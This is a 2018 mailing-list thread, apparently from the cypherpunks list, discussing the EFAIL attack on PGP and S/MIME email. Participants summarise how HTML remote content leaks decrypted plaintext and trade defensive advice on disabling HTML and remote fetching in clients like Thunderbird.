EFail - OpenPGP S/MIME Vulnerability
https://efail.de/ https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html https://efail.de/efail-attack-paper.pdf https://twitter.com/matthew_d_green/status/995989254143606789 https://news.ycombinator.com/item?id=17064129 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie... https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim... The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
On 05/14/2018 01:48 PM, grarpamp wrote:
https://efail.de/ https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html https://efail.de/efail-attack-paper.pdf https://twitter.com/matthew_d_green/status/995989254143606789 https://news.ycombinator.com/item?id=17064129 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie... https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Hmm. No time to dig into this just now, but at first glance: "EFAIL abuses active content of HTML emails" ... indicating that this attack would most likely affect people who run wide-open systems. Take away: E-mail messages != web pages, and processing them as such invites a world of stupidly unnecessary problems.
On 05/14/2018 06:48 AM, grarpamp wrote:
https://efail.de/ https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html https://efail.de/efail-attack-paper.pdf https://twitter.com/matthew_d_green/status/995989254143606789 https://news.ycombinator.com/item?id=17064129 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie... https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Thanks. That's the clearest explanation I've seen.
On 05/14/2018 07:49 PM, Mirimir wrote:
On 05/14/2018 06:48 AM, grarpamp wrote:
https://efail.de/ https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html https://efail.de/efail-attack-paper.pdf https://twitter.com/matthew_d_green/status/995989254143606789 https://news.ycombinator.com/item?id=17064129 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie... https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Thanks. That's the clearest explanation I've seen.
Remember the campaign against HTML email ? I do. We were right. --- Marina
On 05/14/2018 06:05 PM, Marina Brown wrote:
On 05/14/2018 07:49 PM, Mirimir wrote:
On 05/14/2018 06:48 AM, grarpamp wrote:
https://efail.de/ https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html https://efail.de/efail-attack-paper.pdf https://twitter.com/matthew_d_green/status/995989254143606789 https://news.ycombinator.com/item?id=17064129 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Thanks. That's the clearest explanation I've seen.
Remember the campaign against HTML email ? I do. We were right.
--- Marina
Right, and its evil child, remote content. I always disable HTML. And fetching of remote content. And I have since the 90s. I got that from this list :) It's funny that these exploits depend on both. And that some on HN put it all on pgp/gpg, arguing that one can't expect users to know this stuff. By default, Thunderbird does render HTML. But at least it doesn't fetch remote content. So Thunderbird+Enigmail users should be safe.
On 05/15/2018 02:14 AM, Mirimir wrote:
On 05/14/2018 06:05 PM, Marina Brown wrote:
On 05/14/2018 07:49 PM, Mirimir wrote:
On 05/14/2018 06:48 AM, grarpamp wrote:
https://efail.de/ https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html https://efail.de/efail-attack-paper.pdf https://twitter.com/matthew_d_green/status/995989254143606789 https://news.ycombinator.com/item?id=17064129 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Thanks. That's the clearest explanation I've seen.
Remember the campaign against HTML email ? I do. We were right.
--- Marina
Right, and its evil child, remote content.
I always disable HTML. And fetching of remote content.
And I have since the 90s. I got that from this list :)
It's funny that these exploits depend on both. And that some on HN put it all on pgp/gpg, arguing that one can't expect users to know this stuff. By default, Thunderbird does render HTML. But at least it doesn't fetch remote content. So Thunderbird+Enigmail users should be safe.
Honestly i'm missing PINE and ELM right about now. --- Marina
Various:
Remember the campaign against HTML email ? I do. We were right.
I always disable HTML. And fetching of remote content.
And I have since the 90s. I got that from this list :)
Honestly i'm missing PINE and ELM right about now.
trn, ftw. There's neomutt seems popular for text mail these days since mutt was also seen being dormant.
On 05/15/2018 12:05 AM, Marina Brown wrote:
Remember the campaign against HTML email ? I do. We were right.
The campaign is still ongoing. Maybe we have lost in the case of the vast majority of marketing/advertising lists, but Thunderbird and other email clients (thankfully) offer the option to not automatically load external links by default. I do think a future version (actually, the next version) of Thunderbird and/or Enigmail need to put up a big huge "danger" warning when they detect HTML email mixed with encrypted content, especially when it looks like someone has tried to put an encrypted blob as the destination of a link (which as I understand it, is how this exploit works). There's no good reason to do this, and plenty of bad reasons. -- Shawn K. Quinn <skquinn@rushpost.com> http://www.rantroulette.com http://www.skqrecordquest.com
On 05/16/2018 01:27 PM, Shawn K. Quinn wrote:
On 05/15/2018 12:05 AM, Marina Brown wrote:
Remember the campaign against HTML email ? I do. We were right.
The campaign is still ongoing. Maybe we have lost in the case of the vast majority of marketing/advertising lists, but Thunderbird and other email clients (thankfully) offer the option to not automatically load external links by default.
The default in a fresh Thunderbird install is to _not_ fetch remote resources. I've verified that in an Ubuntu LiveCD.
I do think a future version (actually, the next version) of Thunderbird and/or Enigmail need to put up a big huge "danger" warning when they detect HTML email mixed with encrypted content, especially when it looks like someone has tried to put an encrypted blob as the destination of a link (which as I understand it, is how this exploit works). There's no good reason to do this, and plenty of bad reasons.
That's a great idea. The best solution, I believe, would be a tweak to GnuPG that entirely breaks HTML and embedded remote content. That would protect against Efail, no matter how email clients were configured. It'd also protect against other exploits that depend on fetching remote content. And it wouldn't require users to entirely forgo HTML and embedded remote content. Just with GnuPG.
On 05/14/2018 01:48 PM, grarpamp wrote:
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker.
Werner & Co. respond: https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html Spoiler: If your e-mail client software is not borken and malconfigured, this is Not A Thing. If it is, you lost the game a long time ago because don't know anything about the rules, the board, the pieces or the objective. :o/
On Wed, 16 May 2018 01:52:12 -0400 Steve Kinney <admin@pilobilus.net> wrote:
On 05/14/2018 01:48 PM, grarpamp wrote:
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker.
Werner & Co. respond:
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html
Spoiler: If your e-mail client software is not borken and malconfigured, this is Not A Thing.
it doesn't have to be broken as far as I can tell. The trick to get your client to decrypt a message and send the plaintext conforms to the 'mime' protocol garbage. It's a FEATURE not a bug!! =P
If it is, you lost the game a long time ago because don't know anything about the rules, the board, the pieces or the objective.
:o/
On 05/16/2018 09:05 PM, juan wrote:
On Wed, 16 May 2018 01:52:12 -0400 Steve Kinney <admin@pilobilus.net> wrote:
On 05/14/2018 01:48 PM, grarpamp wrote:
The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker.
Werner & Co. respond:
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html
Spoiler: If your e-mail client software is not borken and malconfigured, this is Not A Thing.
it doesn't have to be broken as far as I can tell. The trick to get your client to decrypt a message and send the plaintext conforms to the 'mime' protocol garbage.
It's a FEATURE not a bug!! =P
Aw, you know perfectly well what I mean: Friends don't let friends' e-mail software obey external commands to fetch and (worse) display or execute arbitrary content from arbitrary sources. "Active content" provides a vast array of practical attack vectors to those whose chosen tools /enable/ that content to do so. On purpose. For no reason half worth the exposure. By default, professional quality tools do no such thing unless prompted by the user, bless its pointy little head. Consider for example Mozilla Thunderbird: All-platform, full service on all fronts (access your webmail accounts via IMAP and render them as plain text, for God's sake!), and Free as in if you don't like it, go hack on the code yourself or hire it done to your specifications. :o)
participants (6)
-
grarpamp -
juan -
Marina Brown -
Mirimir -
Shawn K. Quinn -
Steve Kinney